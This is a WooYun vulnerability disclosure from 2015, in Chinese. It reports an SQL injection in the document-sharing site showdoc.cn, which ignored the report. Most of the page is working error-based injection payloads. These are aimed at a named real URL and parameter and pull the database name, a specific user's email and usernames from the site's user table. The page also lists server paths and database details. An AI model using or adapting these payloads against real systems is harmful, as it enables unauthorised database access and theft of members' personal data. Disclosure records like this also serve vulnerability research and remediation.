当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095967

漏洞标题:秀文网SQL注入漏洞

相关厂商:秀文网

漏洞作者: 路人甲

提交时间:2015-02-06 18:13

修复时间:2015-03-23 18:14

公开时间:2015-03-23 18:14

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

对请求的参数没有任何过滤,造成注入漏洞,进管理后台后可以更改及拖会员数据。

详细说明:

注入点(需要先登陆):http://www.showdoc.cn/view/download.php?docid=37403

xx.jpg

漏洞证明:

网站根目录:D:\xampp\htdocs\include\db_mysql.inc
有用户数4598条以上
数据库版本:5.1.41
数据库用户:docm@localhost
得到数据库名:docm

and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(Hex(cast(database() as char))),0x27,0x7e)) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1


得到指定用户的数据:

and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(sys_user.EMAIL as char))),0x27,0x7e) from `docm`.sys_user where USER_NAME='andrewjack') ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,unhex(Hex(cast(sys_user.USER_NAME as char))),0x27,0x7e) from `docm`.sys_user Order by ID limit 98,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
and select 1 from(select count(*),concat(select user())a) and 1=1


登陆用户密码:

xx1.jpg


后台界面:

xx2.jpg

修复方案:

修复这种漏洞注意过滤用户传来的参数就行了

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝